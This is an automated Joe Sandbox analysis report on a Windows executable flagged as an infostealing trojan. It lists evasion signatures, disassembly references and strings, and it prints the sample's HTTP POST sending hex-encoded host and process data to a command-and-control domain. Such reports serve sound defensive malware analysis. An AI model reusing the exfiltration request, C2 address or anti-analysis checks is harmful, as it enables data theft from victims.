Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
t6VDbnvGeN.exe

Overview

General Information

Sample name:t6VDbnvGeN.exe
renamed because original name is a hash value
Original sample name:9e3eebdf7f1998324106447a4eb441c8.exe
Analysis ID:1578907
MD5:9e3eebdf7f1998324106447a4eb441c8
SHA1:d12942ff362dcd14ae488b68c5c9585dea00098f
SHA256:5407d390bc945fe70785068124bf0a35d110e179aae137cdc67cce85824915bf
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • t6VDbnvGeN.exe (PID: 5140 cmdline: "C:\Users\user\Desktop\t6VDbnvGeN.exe" MD5: 9E3EEBDF7F1998324106447A4EB441C8)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: t6VDbnvGeN.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: t6VDbnvGeN.exeReversingLabs: Detection: 42%
Source: t6VDbnvGeN.exeVirustotal: Detection: 52%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: t6VDbnvGeN.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: -----BEGIN PUBLIC KEY-----1_2_007EDCF0
Source: t6VDbnvGeN.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: mov dword ptr [ebp+04h], 424D53FFh1_2_0082A5B0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: mov dword ptr [ebx+04h], 424D53FFh1_2_0082A7F0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: mov dword ptr [edi+04h], 424D53FFh1_2_0082A7F0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: mov dword ptr [esi+04h], 424D53FFh1_2_0082A7F0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: mov dword ptr [edi+04h], 424D53FFh1_2_0082A7F0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: mov dword ptr [esi+04h], 424D53FFh1_2_0082A7F0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: mov dword ptr [ebx+04h], 424D53FFh1_2_0082A7F0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: mov dword ptr [ebx+04h], 424D53FFh1_2_0082B560
Source: t6VDbnvGeN.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_007C255D
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,1_2_007C29FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 560191Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 37 34 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: global trafficHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_0088A8C0 recvfrom,1_2_0088A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fivetk5ht.top
Source: unknownHTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1Host: home.fivetk5ht.topAccept: */*Content-Type: application/jsonContent-Length: 560191Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 37 34 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://.css
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://.jpg
Source: t6VDbnvGeN.exe, 00000001.00000002.1437756228.0000000001ADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPR
Source: t6VDbnvGeN.exe, 00000001.00000003.1401357288.0000000001ACD000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000003.1401710410.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1437756228.0000000001ADD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRE_
Source: t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: t6VDbnvGeN.exe, 00000001.00000003.1402020419.0000000001A61000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1436520961.0000000001A69000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000003.1402037179.0000000001A67000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: t6VDbnvGeN.exe, 00000001.00000003.1402020419.0000000001A61000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1436520961.0000000001A69000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000003.1402037179.0000000001A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1
Source: t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://html4/loose.dtd
Source: t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: t6VDbnvGeN.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: t6VDbnvGeN.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: t6VDbnvGeN.exe, t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: t6VDbnvGeN.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://httpbin.org/ip
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701

System Summary

barindex
PE file contains section with special chars
Source: t6VDbnvGeN.exeStatic PE information: section name:
Source: t6VDbnvGeN.exeStatic PE information: section name: .idata
Source: t6VDbnvGeN.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007D05B01_2_007D05B0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007D6FA01_2_007D6FA0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_0088B1801_2_0088B180
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007FF1001_2_007FF100
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_008900E01_2_008900E0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B4E0301_2_00B4E030
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_008262101_2_00826210
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_0088C3201_2_0088C320
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B144101_2_00B14410
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_008904201_2_00890420
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007CE6201_2_007CE620
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B447801_2_00B44780
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_0082A7F01_2_0082A7F0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B267301_2_00B26730
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_0088C7701_2_0088C770
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007CA9601_2_007CA960
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007D49401_2_007D4940
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_0087C9001_2_0087C900
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00996AC01_2_00996AC0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00A7AAC01_2_00A7AAC0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B38BF01_2_00B38BF0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00A7AB2C1_2_00A7AB2C
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007CCBB01_2_007CCBB0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00954B601_2_00954B60
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B4CC701_2_00B4CC70
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00980D801_2_00980D80
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B3CD801_2_00B3CD80
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B44D401_2_00B44D40
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00ADAE301_2_00ADAE30
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007E4F701_2_007E4F70
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_0088EF901_2_0088EF90
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00888F901_2_00888F90
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B12F901_2_00B12F90
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007D10E61_2_007D10E6
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B2D4301_2_00B2D430
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B335B01_2_00B335B0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B156D01_2_00B156D0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B517801_2_00B51780
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_008798801_2_00879880
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B199201_2_00B19920
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B43A701_2_00B43A70
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00801BE01_2_00801BE0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B31BD01_2_00B31BD0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00A79C801_2_00A79C80
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B27CC01_2_00B27CC0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007D5DB01_2_007D5DB0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007D3ED01_2_007D3ED0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007E5EB01_2_007E5EB0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_00B49FE01_2_00B49FE0
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_075402BB1_2_075402BB
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_075A06F41_2_075A06F4
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_075A079B1_2_075A079B
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 007DCD40 appears 75 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 00805340 appears 50 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 007DCCD0 appears 55 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 00804F40 appears 347 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 007C75A0 appears 710 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 008050A0 appears 101 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 007CC960 appears 37 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 007C73F0 appears 114 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 008A44A0 appears 76 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 00977220 appears 99 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 00804FD0 appears 291 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 007CCAA0 appears 64 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 007C71E0 appears 47 times
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: String function: 0099CBC0 appears 90 times
Source: t6VDbnvGeN.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: t6VDbnvGeN.exeStatic PE information: Section: jyayxkzc ZLIB complexity 0.9943974834543126
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,1_2_007C255D
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeCode function: 1_2_007C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,1_2_007C29FF
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: t6VDbnvGeN.exeReversingLabs: Detection: 42%
Source: t6VDbnvGeN.exeVirustotal: Detection: 52%
Source: t6VDbnvGeN.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: t6VDbnvGeN.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\t6VDbnvGeN.exeSection loaded: napinsp.dllJump to behavior
